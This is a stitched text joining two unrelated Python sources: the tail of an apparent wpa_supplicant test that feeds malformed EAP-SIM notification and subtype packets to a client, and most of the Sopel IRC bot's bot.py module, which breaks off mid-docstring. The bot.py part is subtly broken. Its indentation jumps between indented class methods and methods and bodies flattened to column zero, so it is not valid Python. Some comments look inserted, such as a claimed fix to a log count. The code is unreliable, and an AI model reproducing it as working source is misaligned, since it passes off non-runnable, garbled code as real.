                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16384)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16385)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with unrecognized non-failure")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Re-authentication (unexpected) with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Client Error")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown subtype")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_SIM, 255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None

    srv = start_radius_server(sim_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted handler step; step 0 only
        # waits briefly, every other step must end in EAP failure.
        for i in range(0, 25):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            if i in [ 0 ]:
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
|
bot.py | # Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import generator_stop
from ast import literal_eval
from datetime import datetime
import inspect
import itertools
import logging
import re
import signal
import threading
import time
from types import MappingProxyType
from typing import Mapping, Optional
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
from sopel.irc import modes
import sopel.loader
from sopel.plugin import NOLIMIT
from sopel.plugins import jobs as plugin_jobs, rules as plugin_rules
from sopel.tools import deprecated, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
__all__ = ['Sopel', 'SopelWrapper']

LOGGER = logging.getLogger(__name__)

# Signals that make the bot quit; only the names actually present in the
# `signal` module on this platform are used.
QUIT_SIGNALS = [
    getattr(signal, name)
    for name in ['SIGUSR1', 'SIGTERM', 'SIGINT']
    if hasattr(signal, name)
]
# Signals that make the bot restart instead of quitting.
RESTART_SIGNALS = [
    getattr(signal, name)
    for name in ['SIGUSR2', 'SIGILL']
    if hasattr(signal, name)
]
# Every signal the bot installs a handler for (see Sopel.set_signal_handlers).
SIGNALS = QUIT_SIGNALS + RESTART_SIGNALS
class Sopel(irc.AbstractBot):
    def __init__(self, config, daemon=False):
        """Initialize the bot from its settings.

        :param config: the bot's settings object, passed through to
                       the :class:`irc.AbstractBot` base class
        :param bool daemon: whether the bot runs non-interactively
        """
        super().__init__(config)
        self._daemon = daemon  # Used for iPython. TODO something saner here
        # Set by a restart signal; distinguishes restart from plain quit.
        self.wantsrestart = False
        # Trigger bookkeeping; the lock guards the list below.
        self._running_triggers = []
        self._running_triggers_lock = threading.Lock()
        # Plugin name -> plugin handler for every registered plugin.
        self._plugins = {}
        self._rules_manager = plugin_rules.Manager()
        self._scheduler = plugin_jobs.Scheduler(self)

        self._url_callbacks = tools.SopelMemory()
        """Tracking of manually registered URL callbacks.

        Should be manipulated only by use of :meth:`register_url_callback` and
        :meth:`unregister_url_callback` methods, which are deprecated.

        Remove in Sopel 9, along with the above related methods.
        """

        self._times = {}
        """
        A dictionary mapping lowercased nicks to dictionaries which map
        function names to the time which they were last used by that nick.
        """

        self.server_capabilities = {}
        """A dict mapping supported IRCv3 capabilities to their options.

        For example, if the server specifies the capability ``sasl=EXTERNAL``,
        it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
        without any options will have ``None`` as the value.

        For servers that do not support IRCv3, this will be an empty set.
        """

        self.modeparser = modes.ModeParser()
        """A mode parser used to parse ``MODE`` messages and modestrings."""

        self.channels = tools.SopelIdentifierMemory()
        """A map of the channels that Sopel is in.

        The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
        and map to :class:`sopel.tools.target.Channel` objects which contain
        the users in the channel and their permissions.
        """

        self.users = tools.SopelIdentifierMemory()
        """A map of the users that Sopel is aware of.

        The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
        map to :class:`sopel.tools.target.User` instances. In order for Sopel
        to be aware of a user, it must share at least one mutual channel.
        """

        self.db = SopelDB(config)
        """The bot's database, as a :class:`sopel.db.SopelDB` instance."""

        self.memory = tools.SopelMemory()
        """
        A thread-safe dict for storage of runtime data to be shared between
        plugins. See :class:`sopel.tools.SopelMemory`.
        """

        self.shutdown_methods = []
        """List of methods to call on shutdown."""
    @property
    def rules(self):
        """Rules manager.

        :return: the bot's rules manager, a
                 :class:`sopel.plugins.rules.Manager` instance
        """
        return self._rules_manager
    @property
    def scheduler(self):
        """Job Scheduler. See :func:`sopel.plugin.interval`.

        :return: the bot's job scheduler, a
                 :class:`sopel.plugins.jobs.Scheduler` instance
        """
        return self._scheduler
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# This was supposed to be deprecated, but the built-in help plugin needs it
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
result = {}
for plugin, commands in plugin_commands:
if plugin not in result:
result[plugin] = list(sorted(commands.keys()))
else:
result[plugin].extend(commands.keys())
result[plugin] = list(sorted(result[plugin]))
return result
@property
def doc(self):
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
commands = (
(command, command.get_doc(), command.get_usages())
for plugin, commands in plugin_commands
for command in commands.values()
)
return dict(
(name, (doc.splitlines(), [u['text'] for u in usages]))
for command, doc, usages in commands
for name in ((command.name,) + command.aliases)
)
@property
def hostmask(self) -> Optional[str]:
"""The current hostmask for the bot :class:`~sopel.tools.target.User`.
:return: the bot's current hostmask if the bot is connected and in
a least one channel; ``None`` otherwise
:rtype: Optional[str]
"""
if not self.users or self.nick not in self.users:
# bot must be connected and in at least one channel
return None
return self.users.get(self.nick).hostmask
    @property
    def plugins(self) -> Mapping[str, plugins.handlers.AbstractPluginHandler]:
        """A dict of the bot's currently loaded plugins.

        :return: an immutable map of plugin name to plugin object
        """
        # Read-only proxy so callers cannot mutate the plugin registry.
        return MappingProxyType(self._plugins)
def has_channel_privilege(self, channel, privilege):
"""Tell if the bot has a ``privilege`` level or above in a ``channel``.
:param str channel: a channel the bot is in
:param int privilege: privilege level to check
:raise ValueError: when the channel is unknown
This method checks the bot's privilege level in a channel, i.e. if it
has this level or higher privileges::
>>> bot.channels['#chan'].privileges[bot.nick] = plugin.OP
>>> bot.has_channel_privilege('#chan', plugin.VOICE)
True
The ``channel`` argument can be either a :class:`str` or a
:class:`sopel.tools.Identifier`, as long as Sopel joined said channel.
If the channel is unknown, a :exc:`ValueError` will be raised.
"""
if channel not in self.channels:
raise ValueError('Unknown channel %s' % channel)
return self.channels[channel].has_privilege(self.nick, privilege)
# signal handlers
def set_signal_handlers(self):
"""Set signal handlers for the bot.
Before running the bot, this method can be called from the main thread
to setup signals. If the bot is connected, upon receiving a signal it
will send a ``QUIT`` message. Otherwise, it raises a
:exc:`KeyboardInterrupt` error.
.. note::
Per the Python documentation of :func:`signal.signal`:
When threads are enabled, this function can only be called from
the main thread; attempting to call it from other threads will
cause a :exc:`ValueError` exception to be raised.
"""
for obj in SIGNALS:
signal.signal(obj, self._signal_handler)
    def _signal_handler(self, sig, frame):
        """Handle an OS signal delivered to the bot.

        :param int sig: the received signal number
        :param frame: current stack frame (unused)

        Quit signals send ``QUIT`` when connected, or set the quit flag and
        raise :exc:`KeyboardInterrupt` when not. Restart signals do the same
        with the restart flag set as well.
        """
        if sig in QUIT_SIGNALS:
            if self.backend.is_connected():
                LOGGER.warning("Got quit signal, sending QUIT to server.")
                self.quit('Closing')
            else:
                self.hasquit = True  # mark the bot as "want to quit"
                LOGGER.warning("Got quit signal.")
                # not connected: nothing to send, just break out of the run loop
                raise KeyboardInterrupt
        elif sig in RESTART_SIGNALS:
            if self.backend.is_connected():
                LOGGER.warning("Got restart signal, sending QUIT to server.")
                self.restart('Restarting')
            else:
                LOGGER.warning("Got restart signal.")
                self.wantsrestart = True  # mark the bot as "want to restart"
                self.hasquit = True  # mark the bot as "want to quit"
                raise KeyboardInterrupt
# setup
    def setup(self):
        """Set up Sopel bot before it can run.

        The setup phase is in charge of:

        * setting up logging (configure Python's built-in :mod:`logging`)
        * setting up the bot's plugins (load, setup, and register)
        * starting the job scheduler
        """
        # Order matters: logging must be configured before plugins load
        # (loading logs), and post_setup starts the scheduler last.
        self.setup_logging()
        self.setup_plugins()
        self.post_setup()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
    """Load plugins into the bot.

    Each usable plugin is loaded, set up, and registered. Disabled
    plugins are skipped, and load/setup errors are logged without
    aborting the rest of the setup phase.
    """
    load_success = 0
    load_error = 0
    load_disabled = 0

    LOGGER.info("Loading plugins...")
    usable_plugins = plugins.get_usable_plugins(self.settings)
    for name, info in usable_plugins.items():
        plugin, is_enabled = info
        if not is_enabled:
            load_disabled += 1
            continue

        try:
            plugin.load()
        except Exception as e:
            load_error += 1
            LOGGER.exception("Error loading %s: %s", name, e)
        except SystemExit:
            # a plugin calling sys.exit() must not take the bot down
            load_error += 1
            LOGGER.exception(
                "Error loading %s (plugin tried to exit)", name)
        else:
            try:
                if plugin.has_setup():
                    plugin.setup(self)
                plugin.register(self)
            except Exception as e:
                load_error += 1
                LOGGER.exception("Error in %s setup: %s", name, e)
            else:
                load_success += 1
                LOGGER.info("Plugin loaded: %s", name)

    total = load_success + load_error + load_disabled
    if total and load_success:
        # Fixed: the summary previously logged `load_success - 1`,
        # under-reporting the number of registered plugins by one.
        LOGGER.info(
            "Registered %d plugins, %d failed, %d disabled",
            load_success,
            load_error,
            load_disabled)
    else:
        LOGGER.warning("Warning: Couldn't load any plugins")
# post setup
def post_setup(self):
    """Perform post-setup actions.

    This method handles everything that should happen after all the
    plugins are loaded, and before the bot can connect to the IRC
    server: it warns about configuration options that are not defined
    by their section, then starts the job scheduler.

    .. versionadded:: 7.1
    """
    settings = self.settings
    for section_name, section in settings.get_defined_sections():
        # option names declared on the section object, normalized the
        # same way the config parser normalizes option names
        defined_options = {
            settings.parser.optionxform(opt)
            for opt, _ in inspect.getmembers(section)
            if not opt.startswith('_')
        }
        for option_name in settings.parser.options(section_name):
            if option_name in defined_options:
                continue
            LOGGER.warning(
                "Config option `%s.%s` is not defined by its section "
                "and may not be recognized by Sopel.",
                section_name,
                option_name,
            )

    self._scheduler.start()
# plugins management
def reload_plugin(self, name):
    """Reload a plugin.

    :param str name: name of the plugin to reload
    :raise plugins.exceptions.PluginNotRegistered: when there is no
        ``name`` plugin registered

    The plugin's shutdown routine runs and the plugin is unregistered
    from the bot; it is then reloaded, set up, and registered again.
    """
    if not self.has_plugin(name):
        raise plugins.exceptions.PluginNotRegistered(name)

    handler = self._plugins[name]

    # phase 1: tear the old version down
    handler.shutdown(self)
    handler.unregister(self)
    LOGGER.info("Unloaded plugin %s", name)

    # phase 2: bring the fresh version up
    handler.reload()
    handler.setup(self)
    handler.register(self)
    meta = handler.get_meta_description()
    LOGGER.info("Reloaded %s plugin %s from %s",
                meta['type'], name, meta['source'])
def reload_plugins(self):
    """Reload all registered plugins.

    Every plugin's shutdown routine runs and the plugin is
    unregistered; then each one is reloaded, set up, and registered
    again.
    """
    registered = list(self._plugins.items())

    # phase 1: tear every plugin down
    for name, handler in registered:
        handler.shutdown(self)
        handler.unregister(self)
        LOGGER.info("Unloaded plugin %s", name)

    # phase 2: bring every plugin back up
    for name, handler in registered:
        handler.reload()
        handler.setup(self)
        handler.register(self)
        meta = handler.get_meta_description()
        LOGGER.info("Reloaded %s plugin %s from %s",
                    meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
    """Add a loaded plugin to the bot's registry.

    :param plugin: loaded plugin to add
    :type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
    :param callables: an iterable of callables from the ``plugin``
    :type callables: :term:`iterable`
    :param jobs: an iterable of functions from the ``plugin`` that are
                 periodically invoked
    :type jobs: :term:`iterable`
    :param shutdowns: an iterable of functions from the ``plugin`` that
                      should be called on shutdown
    :type shutdowns: :term:`iterable`
    :param urls: an iterable of functions from the ``plugin`` to call
                 when matched against a URL
    :type urls: :term:`iterable`
    """
    self._plugins[plugin.name] = plugin
    # hand each group of plugin objects to its dedicated registrar
    for register, items in (
            (self.register_callables, callables),
            (self.register_jobs, jobs),
            (self.register_shutdowns, shutdowns),
            (self.register_urls, urls)):
        register(items)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
    """Remove a loaded plugin from the bot's registry.

    :param plugin: loaded plugin to remove
    :type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
    :param callables: an iterable of callables from the ``plugin``
    :type callables: :term:`iterable`
    :param jobs: an iterable of functions from the ``plugin`` that are
                 periodically invoked
    :type jobs: :term:`iterable`
    :param shutdowns: an iterable of functions from the ``plugin`` that
                      should be called on shutdown
    :type shutdowns: :term:`iterable`
    :param urls: an iterable of functions from the ``plugin`` to call
                 when matched against a URL
    :type urls: :term:`iterable`
    :raise plugins.exceptions.PluginNotRegistered: when there is no
        ``name`` plugin registered
    """
    name = plugin.name
    if not self.has_plugin(name):
        raise plugins.exceptions.PluginNotRegistered(name)

    # drop the plugin's rules, scheduled jobs, and shutdown callbacks
    self._rules_manager.unregister_plugin(name)
    self._scheduler.unregister_plugin(name)
    self.unregister_shutdowns(shutdowns)

    # finally, forget the plugin itself
    del self._plugins[name]
def has_plugin(self, name):
    """Check if the bot has registered a plugin of the specified name.

    :param str name: name of the plugin to check for
    :return: whether the bot has a plugin named ``name`` registered
    :rtype: bool
    """
    # membership test against the internal plugin registry
    return name in self._plugins
def get_plugin_meta(self, name):
    """Get info about a registered plugin by its name.

    :param str name: name of the plugin about which to get info
    :return: the plugin's metadata (see
        :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
    :rtype: :class:`dict`
    :raise plugins.exceptions.PluginNotRegistered: when there is no
        ``name`` plugin registered
    """
    if not self.has_plugin(name):
        raise plugins.exceptions.PluginNotRegistered(name)

    return self._plugins[name].get_meta_description()
# callable management
def register_callables(self, callables):
    """Register plugin callables as rules and commands with the bot.

    :param callables: iterable of decorated plugin callables

    Each callable is inspected for the marker attributes set by the
    ``sopel.plugin`` decorators (plain/find/search rules, their lazy
    variants, and the three command flavors) and registered with the
    rules manager accordingly. A callable with no rule and no command
    attribute is registered as a match-anything rule.
    """
    match_any = re.compile(r'.*')
    settings = self.settings

    for callbl in callables:
        # collect every decorator-set attribute (missing -> empty)
        rules = getattr(callbl, 'rule', [])
        lazy_rules = getattr(callbl, 'rule_lazy_loaders', [])
        find_rules = getattr(callbl, 'find_rules', [])
        lazy_find_rules = getattr(callbl, 'find_rules_lazy_loaders', [])
        search_rules = getattr(callbl, 'search_rules', [])
        lazy_search_rules = getattr(callbl, 'search_rules_lazy_loaders', [])
        commands = getattr(callbl, 'commands', [])
        nick_commands = getattr(callbl, 'nickname_commands', [])
        action_commands = getattr(callbl, 'action_commands', [])

        is_rule = any([
            rules,
            lazy_rules,
            find_rules,
            lazy_find_rules,
            search_rules,
            lazy_search_rules,
        ])
        is_command = any([commands, nick_commands, action_commands])

        if rules:
            rule = plugin_rules.Rule.from_callable(settings, callbl)
            self._rules_manager.register(rule)

        if lazy_rules:
            # lazy loaders run here and may fail; log instead of aborting
            try:
                rule = plugin_rules.Rule.from_callable_lazy(
                    settings, callbl)
                self._rules_manager.register(rule)
            except plugins.exceptions.PluginError as err:
                LOGGER.error('Cannot register rule: %s', err)

        if find_rules:
            rule = plugin_rules.FindRule.from_callable(settings, callbl)
            self._rules_manager.register(rule)

        if lazy_find_rules:
            try:
                rule = plugin_rules.FindRule.from_callable_lazy(
                    settings, callbl)
                self._rules_manager.register(rule)
            except plugins.exceptions.PluginError as err:
                LOGGER.error('Cannot register find rule: %s', err)

        if search_rules:
            rule = plugin_rules.SearchRule.from_callable(settings, callbl)
            self._rules_manager.register(rule)

        if lazy_search_rules:
            try:
                rule = plugin_rules.SearchRule.from_callable_lazy(
                    settings, callbl)
                self._rules_manager.register(rule)
            except plugins.exceptions.PluginError as err:
                LOGGER.error('Cannot register search rule: %s', err)

        if commands:
            rule = plugin_rules.Command.from_callable(settings, callbl)
            self._rules_manager.register_command(rule)

        if nick_commands:
            rule = plugin_rules.NickCommand.from_callable(
                settings, callbl)
            self._rules_manager.register_nick_command(rule)

        if action_commands:
            rule = plugin_rules.ActionCommand.from_callable(
                settings, callbl)
            self._rules_manager.register_action_command(rule)

        if not is_command and not is_rule:
            # no decorator matched: treat the callable as a catch-all
            # rule (note: this mutates the callable itself)
            callbl.rule = [match_any]
            self._rules_manager.register(
                plugin_rules.Rule.from_callable(self.settings, callbl))
def register_jobs(self, jobs):
    """Register periodic jobs with the bot's job scheduler.

    :param jobs: iterable of plugin callables to run periodically
    """
    for handler in jobs:
        self._scheduler.register(
            sopel.tools.jobs.Job.from_callable(self.settings, handler))
def unregister_jobs(self, jobs):
    """Remove the given jobs from the bot's job scheduler.

    :param jobs: iterable of plugin callables to unschedule
    """
    remove = self._scheduler.remove_callable_job
    for handler in jobs:
        remove(handler)
def register_shutdowns(self, shutdowns):
    """Append plugin shutdown routines to the bot's shutdown list.

    :param shutdowns: iterable of callables to invoke on shutdown
    """
    # rebind a fresh list instead of extending in place, so other
    # holders of the old list are unaffected
    self.shutdown_methods = [*self.shutdown_methods, *shutdowns]
def unregister_shutdowns(self, shutdowns):
    """Remove the given shutdown routines from the bot's shutdown list.

    :param shutdowns: iterable of callables to stop invoking on shutdown
    """
    kept = [
        handler
        for handler in self.shutdown_methods
        if handler not in shutdowns
    ]
    self.shutdown_methods = kept
def register_urls(self, urls):
    """Register plugin URL callbacks with the rules manager.

    :param urls: iterable of plugin callables matched against URLs
    """
    for handler in urls:
        if getattr(handler, 'url_regex', []):
            self._rules_manager.register_url_callback(
                plugin_rules.URLCallback.from_callable(
                    self.settings, handler))

        if getattr(handler, 'url_lazy_loaders', None):
            # lazy loaders run here and may fail; log instead of aborting
            try:
                self._rules_manager.register_url_callback(
                    plugin_rules.URLCallback.from_callable_lazy(
                        self.settings, handler))
            except plugins.exceptions.PluginError as err:
                LOGGER.error("Cannot register URL callback: %s", err)
# message dispatch
def call_rule(self, rule, sopel, trigger):
    """Execute a triggered rule, honoring rate limits and channel config.

    :param rule: the rule that matched the incoming line
    :param sopel: a SopelWrapper instance passed to the rule
    :param trigger: the Trigger object for the matched line

    Errors raised by the rule (other than ``KeyboardInterrupt``) are
    routed to :meth:`error` instead of propagating.
    """
    # rate limiting: admins and unblockable rules bypass all limits
    if not trigger.admin and not rule.is_unblockable():
        if rule.is_rate_limited(trigger.nick):
            return
        if not trigger.is_privmsg and rule.is_channel_rate_limited(trigger.sender):
            return
        if rule.is_global_rate_limited():
            return

    # channel config: a per-channel config section may disable plugins
    # or individual rules in that channel
    if trigger.sender in self.config:
        channel_config = self.config[trigger.sender]

        # disable listed plugins completely on provided channel
        if 'disable_plugins' in channel_config:
            disabled_plugins = channel_config.disable_plugins.split(',')

            # '*' disables every plugin in this channel
            if '*' in disabled_plugins:
                return
            elif rule.get_plugin_name() in disabled_plugins:
                return

        # disable chosen methods from plugins
        # NOTE(review): parsed with literal_eval; presumably a
        # dict-literal mapping plugin name -> rule labels — confirm.
        if 'disable_commands' in channel_config:
            disabled_commands = literal_eval(channel_config.disable_commands)
            disabled_commands = disabled_commands.get(rule.get_plugin_name(), [])
            if rule.get_rule_label() in disabled_commands:
                return

    try:
        rule.execute(sopel, trigger)
    except KeyboardInterrupt:
        # let Ctrl-C propagate so the bot can shut down
        raise
    except Exception as error:
        self.error(trigger, exception=error)
def call(self, func, sopel, trigger):
    """Call a function, applying any rate limits or other restrictions.

    :param func: the function to call
    :type func: :term:`function`
    :param sopel: a SopelWrapper instance
    :type sopel: :class:`SopelWrapper`
    :param Trigger trigger: the Trigger object for the line from the server
                            that triggered this call
    """
    nick = trigger.nick
    current_time = time.time()
    # lazily create the per-sender timestamp maps used for rate
    # limiting; the bot's own nick keys the global (per-function) map
    if nick not in self._times:
        self._times[nick] = dict()
    if self.nick not in self._times:
        self._times[self.nick] = dict()
    if not trigger.is_privmsg and trigger.sender not in self._times:
        self._times[trigger.sender] = dict()

    if not trigger.admin and not func.unblockable:
        # per-user rate limit
        if func in self._times[nick]:
            usertimediff = current_time - self._times[nick][func]
            if func.rate > 0 and usertimediff < func.rate:
                LOGGER.info(
                    "%s prevented from using %s in %s due to user limit: %d < %d",
                    trigger.nick, func.__name__, trigger.sender, usertimediff,
                    func.rate
                )
                return

        # global (all senders combined) rate limit
        if func in self._times[self.nick]:
            globaltimediff = current_time - self._times[self.nick][func]
            if func.global_rate > 0 and globaltimediff < func.global_rate:
                LOGGER.info(
                    "%s prevented from using %s in %s due to global limit: %d < %d",
                    trigger.nick, func.__name__, trigger.sender, globaltimediff,
                    func.global_rate
                )
                return

        # per-channel rate limit (not applicable to private messages)
        if not trigger.is_privmsg and func in self._times[trigger.sender]:
            chantimediff = current_time - self._times[trigger.sender][func]
            if func.channel_rate > 0 and chantimediff < func.channel_rate:
                LOGGER.info(
                    "%s prevented from using %s in %s due to channel limit: %d < %d",
                    trigger.nick, func.__name__, trigger.sender, chantimediff,
                    func.channel_rate
                )
                return

    # if channel has its own config section, check for excluded plugins/plugin methods
    if trigger.sender in self.config:
        channel_config = self.config[trigger.sender]
        LOGGER.debug(
            "Evaluating configuration for %s.%s in channel %s",
            func.plugin_name, func.__name__, trigger.sender
        )

        # disable listed plugins completely on provided channel
        if 'disable_plugins' in channel_config:
            disabled_plugins = channel_config.disable_plugins.split(',')

            # if "*" is used, we are disabling all plugins on provided channel
            if '*' in disabled_plugins:
                LOGGER.debug(
                    "All plugins disabled in %s; skipping execution of %s.%s",
                    trigger.sender, func.plugin_name, func.__name__
                )
                return
            if func.plugin_name in disabled_plugins:
                LOGGER.debug(
                    "Plugin %s is disabled in %s; skipping execution of %s",
                    func.plugin_name, trigger.sender, func.__name__
                )
                return

        # disable chosen methods from plugins
        # NOTE(review): parsed with literal_eval; presumably a
        # dict-literal mapping plugin name -> function names — confirm.
        if 'disable_commands' in channel_config:
            disabled_commands = literal_eval(channel_config.disable_commands)
            if func.plugin_name in disabled_commands:
                if func.__name__ in disabled_commands[func.plugin_name]:
                    LOGGER.debug(
                        "Skipping execution of %s.%s in %s: disabled_commands matched",
                        func.plugin_name, func.__name__, trigger.sender
                    )
                    return

    try:
        exit_code = func(sopel, trigger)
    except Exception as error:  # TODO: Be specific
        exit_code = None
        self.error(trigger, exception=error)

    # NOLIMIT means this call should not count against rate limits
    if exit_code != NOLIMIT:
        self._times[nick][func] = current_time
        self._times[self.nick][func] = current_time
        if not trigger.is_privmsg:
            self._times[trigger.sender][func] = current_time
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
    """Dispatch a parsed message to any registered callables.

    :param pretrigger: a parsed message from the server
    :type pretrigger: :class:`~sopel.trigger.PreTrigger`

    The ``pretrigger`` (a parsed message) is used to find matching rules;
    it will retrieve them by order of priority, and execute them. It runs
    triggered rules in separate threads, unless they are marked otherwise.

    However, it won't run triggered blockable rules at all when they can't
    be executed for blocked nickname or hostname.

    .. seealso::

        The pattern matching is done by the
        :class:`Rules Manager<sopel.plugins.rules.Manager>`.
    """
    # list of commands running in separate threads for this dispatch
    running_triggers = []

    # nickname/hostname blocking
    nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
    blocked = bool(nick_blocked or host_blocked)
    list_of_blocked_rules = set()

    # account info
    nick = pretrigger.nick
    user_obj = self.users.get(nick)
    account = user_obj.account if user_obj else None

    # skip processing replayed messages: a server-time tag older than
    # our channel join time means the message predates this session
    if "time" in pretrigger.tags and pretrigger.sender in self.channels:
        join_time = self.channels[pretrigger.sender].join_time
        if join_time is not None and pretrigger.time < join_time:
            return

    for rule, match in self._rules_manager.get_triggered_rules(self, pretrigger):
        trigger = Trigger(self.settings, pretrigger, match, account)

        is_unblockable = trigger.admin or rule.is_unblockable()
        if blocked and not is_unblockable:
            # record the rule for the debug log below, but don't run it
            list_of_blocked_rules.add(str(rule))
            continue

        wrapper = SopelWrapper(
            self, trigger, output_prefix=rule.get_output_prefix())

        if rule.is_threaded():
            # run in a separate thread
            targs = (rule, wrapper, trigger)
            t = threading.Thread(target=self.call_rule, args=targs)
            plugin_name = rule.get_plugin_name()
            rule_label = rule.get_rule_label()
            # tag the thread name for easier debugging
            t.name = '%s-%s-%s' % (t.name, plugin_name, rule_label)
            t.start()
            running_triggers.append(t)
        else:
            # direct call
            self.call_rule(rule, wrapper, trigger)

    # update currently running triggers
    self._update_running_triggers(running_triggers)

    if list_of_blocked_rules:
        if nick_blocked and host_blocked:
            block_type = 'both blocklists'
        elif nick_blocked:
            block_type = 'nick blocklist'
        else:
            block_type = 'host blocklist'
        LOGGER.debug(
            "%s prevented from using %s by %s.",
            pretrigger.nick,
            ', '.join(list_of_blocked_rules),
            block_type,
        )
@property
def running_triggers(self):
    """Current active threads for triggers.

    :return: the running thread(s) currently processing trigger(s)
    :rtype: :term:`iterable`

    This is for testing and debugging purposes only.
    """
    # snapshot under the lock so the list can't change mid-filter
    with self._running_triggers_lock:
        return [
            thread
            for thread in self._running_triggers
            if thread.is_alive()
        ]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
